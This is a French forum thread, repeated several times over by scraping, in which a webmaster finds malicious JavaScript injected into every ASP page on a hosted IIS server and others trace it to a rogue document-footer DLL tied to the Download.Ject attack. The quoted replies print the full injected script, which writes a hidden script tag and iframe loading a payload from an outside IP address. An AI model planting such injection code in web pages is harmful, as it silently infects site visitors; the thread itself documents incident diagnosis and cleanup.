Bonjour, j'ai le Pb suivant :
Toutes les pages asp appelant un fichier js externe avec la balise :
<script type="text/javascript" language="JavaScript"
src="../Back-office/fonctions.js">
se voient rajouter le code suivant :
<script language="JavaScript">
<!--
var qxco7=document.cookie;
function gc099(n21) {
var ix=qxco7.indexOf(n21+"=");
if(ix==-1)return null;
ix=qxco7.indexOf("=",ix)+1;
var es=qxco7.indexOf(";",ix);
if(es==-1)es=qxco7.length;
return unescape(qxco7.substring(ix,es));
}
function sc088(n24,v8){
var today=new Date();
var expiry=new Date(today.getTime()+600000);
if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
expires="+expiry.toGMTString();qxco7=document.cookie;
}
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Yann-Loïc
Bonjour,
Y aurait il un filtre ISAPI suspect ou un programme résident en mémoire dans le gestionnaire de tâche?
Yann-Loïc -- This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in message news:%
Bonjour, j'ai le Pb suivant : Toutes les pages asp appelant un fichier js externe avec la balise : <script type="text/javascript" language="JavaScript" src="../Back-office/fonctions.js">
se voient rajouter le code suivant :
<script language="JavaScript"> <!-- var qxco7=document.cookie;
function gc099(n21) { var ix=qxco7.indexOf(n21+"="); if(ix==-1)return null; ix=qxco7.indexOf("=",ix)+1; var es=qxco7.indexOf(";",ix); if(es==-1)es=qxco7.length; return unescape(qxco7.substring(ix,es)); }
function sc088(n24,v8){ var today=new Date(); var expiry=new Date(today.getTime()+600000); if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie; }
et ce script appelle dans un iframe une page qui vous infecte du virus Download.Ject !!!!!
Mon soucis : ou chercher dans IIS afin de virer cet ajout automatique de code !!!
Merci d'avance.
Bonjour,
Y aurait il un filtre ISAPI suspect ou un programme résident en mémoire dans
le gestionnaire de tâche?
Yann-Loïc
--
This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in
message news:%23olJ4cQWEHA.3512@TK2MSFTNGP12.phx.gbl...
Bonjour, j'ai le Pb suivant :
Toutes les pages asp appelant un fichier js externe avec la balise :
<script type="text/javascript" language="JavaScript"
src="../Back-office/fonctions.js">
se voient rajouter le code suivant :
<script language="JavaScript">
<!--
var qxco7=document.cookie;
function gc099(n21) {
var ix=qxco7.indexOf(n21+"=");
if(ix==-1)return null;
ix=qxco7.indexOf("=",ix)+1;
var es=qxco7.indexOf(";",ix);
if(es==-1)es=qxco7.length;
return unescape(qxco7.substring(ix,es));
}
function sc088(n24,v8){
var today=new Date();
var expiry=new Date(today.getTime()+600000);
if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
expires="+expiry.toGMTString();qxco7=document.cookie;
}
Y aurait il un filtre ISAPI suspect ou un programme résident en mémoire dans le gestionnaire de tâche?
Yann-Loïc -- This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in message news:%
Bonjour, j'ai le Pb suivant : Toutes les pages asp appelant un fichier js externe avec la balise : <script type="text/javascript" language="JavaScript" src="../Back-office/fonctions.js">
se voient rajouter le code suivant :
<script language="JavaScript"> <!-- var qxco7=document.cookie;
function gc099(n21) { var ix=qxco7.indexOf(n21+"="); if(ix==-1)return null; ix=qxco7.indexOf("=",ix)+1; var es=qxco7.indexOf(";",ix); if(es==-1)es=qxco7.length; return unescape(qxco7.substring(ix,es)); }
function sc088(n24,v8){ var today=new Date(); var expiry=new Date(today.getTime()+600000); if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie; }
et ce script appelle dans un iframe une page qui vous infecte du virus Download.Ject !!!!!
Mon soucis : ou chercher dans IIS afin de virer cet ajout automatique de code !!!
Merci d'avance.
burkejon2002
There has been a program installed and executed on your server that enables documentfooter dll's to all your sites. That dll contains the exploit javascript code that creates a virus warning for your visitors. Go ahaed and uncheck use documentfooter and delete the refering dlls. Scan for trojan's on the server as well
/burkejon
"Yann-Loïc" wrote in message news:...
Bonjour,
Y aurait il un filtre ISAPI suspect ou un programme résident en mémoire dans le gestionnaire de tâche?
Yann-Loïc -- This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in message news:% > Bonjour, j'ai le Pb suivant : > Toutes les pages asp appelant un fichier js externe avec la balise : > <script type="text/javascript" language="JavaScript" > src="../Back-office/fonctions.js"> > > se voient rajouter le code suivant : > > <script language="JavaScript"> > <!-- > var qxco7=document.cookie; > > function gc099(n21) { > var ix=qxco7.indexOf(n21+"="); > if(ix==-1)return null; > ix=qxco7.indexOf("=",ix)+1; > var es=qxco7.indexOf(";",ix); > if(es==-1)es=qxco7.length; > return unescape(qxco7.substring(ix,es)); > } > > function sc088(n24,v8){ > var today=new Date(); > var expiry=new Date(today.getTime()+600000); > if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; > expires="+expiry.toGMTString();qxco7=document.cookie; > } > > function okx12(){ > window.status=""; > setTimeout("okx12()", 200);}okx12(); > if(location.href.indexOf("https")!=0){ > if(gc099("trk716")==null){ > document.write("<script language="JavaScript" > src="http://217.107.218.147/dot.php"></script><iframe > src="http://217.107.218.147/dot.php" height="1" width="1" > scrolling="no" frameborder="no"/>"); > sc088("trk716","4"); > } > } > > // --> > > </script> > > et ce script appelle dans un iframe une page qui vous infecte du virus > Download.Ject !!!!! > > Mon soucis : ou chercher dans IIS afin de virer cet ajout automatique de > code !!! > > Merci d'avance. > >
There has been a program installed and executed on your server that
enables documentfooter dll's to all your sites. That dll contains the
exploit javascript code that creates a virus warning for your
visitors. Go ahaed and uncheck use documentfooter and delete the
refering dlls. Scan for trojan's on the server as well
/burkejon
"Yann-Loïc" <yanno@online.microsoft.com> wrote in message news:<eJtoARUWEHA.2288@TK2MSFTNGP10.phx.gbl>...
Bonjour,
Y aurait il un filtre ISAPI suspect ou un programme résident en mémoire dans
le gestionnaire de tâche?
Yann-Loïc
--
This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in
message news:%23olJ4cQWEHA.3512@TK2MSFTNGP12.phx.gbl...
> Bonjour, j'ai le Pb suivant :
> Toutes les pages asp appelant un fichier js externe avec la balise :
> <script type="text/javascript" language="JavaScript"
> src="../Back-office/fonctions.js">
>
> se voient rajouter le code suivant :
>
> <script language="JavaScript">
> <!--
> var qxco7=document.cookie;
>
> function gc099(n21) {
> var ix=qxco7.indexOf(n21+"=");
> if(ix==-1)return null;
> ix=qxco7.indexOf("=",ix)+1;
> var es=qxco7.indexOf(";",ix);
> if(es==-1)es=qxco7.length;
> return unescape(qxco7.substring(ix,es));
> }
>
> function sc088(n24,v8){
> var today=new Date();
> var expiry=new Date(today.getTime()+600000);
> if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
> expires="+expiry.toGMTString();qxco7=document.cookie;
> }
>
> function okx12(){
> window.status="";
> setTimeout("okx12()", 200);}okx12();
> if(location.href.indexOf("https")!=0){
> if(gc099("trk716")==null){
> document.write("<script language="JavaScript"
> src="http://217.107.218.147/dot.php"></script><iframe
> src="http://217.107.218.147/dot.php" height="1" width="1"
> scrolling="no" frameborder="no"/>");
> sc088("trk716","4");
> }
> }
>
> // -->
>
> </script>
>
> et ce script appelle dans un iframe une page qui vous infecte du virus
> Download.Ject !!!!!
>
> Mon soucis : ou chercher dans IIS afin de virer cet ajout automatique de
> code !!!
>
> Merci d'avance.
>
>
There has been a program installed and executed on your server that enables documentfooter dll's to all your sites. That dll contains the exploit javascript code that creates a virus warning for your visitors. Go ahaed and uncheck use documentfooter and delete the refering dlls. Scan for trojan's on the server as well
/burkejon
"Yann-Loïc" wrote in message news:...
Bonjour,
Y aurait il un filtre ISAPI suspect ou un programme résident en mémoire dans le gestionnaire de tâche?
Yann-Loïc -- This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in message news:% > Bonjour, j'ai le Pb suivant : > Toutes les pages asp appelant un fichier js externe avec la balise : > <script type="text/javascript" language="JavaScript" > src="../Back-office/fonctions.js"> > > se voient rajouter le code suivant : > > <script language="JavaScript"> > <!-- > var qxco7=document.cookie; > > function gc099(n21) { > var ix=qxco7.indexOf(n21+"="); > if(ix==-1)return null; > ix=qxco7.indexOf("=",ix)+1; > var es=qxco7.indexOf(";",ix); > if(es==-1)es=qxco7.length; > return unescape(qxco7.substring(ix,es)); > } > > function sc088(n24,v8){ > var today=new Date(); > var expiry=new Date(today.getTime()+600000); > if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; > expires="+expiry.toGMTString();qxco7=document.cookie; > } > > function okx12(){ > window.status=""; > setTimeout("okx12()", 200);}okx12(); > if(location.href.indexOf("https")!=0){ > if(gc099("trk716")==null){ > document.write("<script language="JavaScript" > src="http://217.107.218.147/dot.php"></script><iframe > src="http://217.107.218.147/dot.php" height="1" width="1" > scrolling="no" frameborder="no"/>"); > sc088("trk716","4"); > } > } > > // --> > > </script> > > et ce script appelle dans un iframe une page qui vous infecte du virus > Download.Ject !!!!! > > Mon soucis : ou chercher dans IIS afin de virer cet ajout automatique de > code !!! > > Merci d'avance. > >
Christophe KERHOUSSE
Merci à vous deux, le soucis était bien un footer ajouté automatiquement.
Merci à vous deux, le soucis était bien un footer ajouté automatiquement.
Yann-Loïc -- This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in message news:
Merci à vous deux, le soucis était bien un footer ajouté automatiquement.
Christophe KERHOUSSE
Merci Yann-Loïc pour ces précisions. J'ai fait suivre à mon hébergeur car en fait je n'ai pas la main sur le serveur infecté et le support est nul à ch...
Ils m'avaient dit dans un premier temps que tout était OK sur le IIS chez eux avant que je les mettes sur la piste (grâce aux réponse de ce forum) ...
No Comment...
Merci Yann-Loïc pour ces précisions.
J'ai fait suivre à mon hébergeur car en fait je n'ai pas la main sur le
serveur infecté et le support est nul à ch...
Ils m'avaient dit dans un premier temps que tout était OK sur le IIS chez
eux avant que je les mettes sur la piste (grâce aux réponse de ce forum) ...
Merci Yann-Loïc pour ces précisions. J'ai fait suivre à mon hébergeur car en fait je n'ai pas la main sur le serveur infecté et le support est nul à ch...
Ils m'avaient dit dans un premier temps que tout était OK sur le IIS chez eux avant que je les mettes sur la piste (grâce aux réponse de ce forum) ...
No Comment...
Yann-Loïc
Les articles officiels sont sur notre site: http://www.microsoft.com/security/incident/download_ject.mspx http://support.microsoft.com/?kbid1277 http://www.microsoft.com/presspass/press/2004/jun04/0625download-jectstatement.asp
-- This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in message news:
Merci Yann-Loïc pour ces précisions. J'ai fait suivre à mon hébergeur car en fait je n'ai pas la main sur le serveur infecté et le support est nul à ch...
Ils m'avaient dit dans un premier temps que tout était OK sur le IIS chez eux avant que je les mettes sur la piste (grâce aux réponse de ce forum)
...
No Comment...
Les articles officiels sont sur notre site:
http://www.microsoft.com/security/incident/download_ject.mspx
http://support.microsoft.com/?kbid1277
http://www.microsoft.com/presspass/press/2004/jun04/0625download-jectstatement.asp
--
This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in
message news:emBXHCsWEHA.3800@TK2MSFTNGP11.phx.gbl...
Merci Yann-Loïc pour ces précisions.
J'ai fait suivre à mon hébergeur car en fait je n'ai pas la main sur le
serveur infecté et le support est nul à ch...
Ils m'avaient dit dans un premier temps que tout était OK sur le IIS chez
eux avant que je les mettes sur la piste (grâce aux réponse de ce forum)
Les articles officiels sont sur notre site: http://www.microsoft.com/security/incident/download_ject.mspx http://support.microsoft.com/?kbid1277 http://www.microsoft.com/presspass/press/2004/jun04/0625download-jectstatement.asp
-- This posting is provided "AS IS" with no warranties, and confers no rights.
"Christophe KERHOUSSE" <redtech(enlever cette parenthèse)@free.fr> wrote in message news:
Merci Yann-Loïc pour ces précisions. J'ai fait suivre à mon hébergeur car en fait je n'ai pas la main sur le serveur infecté et le support est nul à ch...
Ils m'avaient dit dans un premier temps que tout était OK sur le IIS chez eux avant que je les mettes sur la piste (grâce aux réponse de ce forum)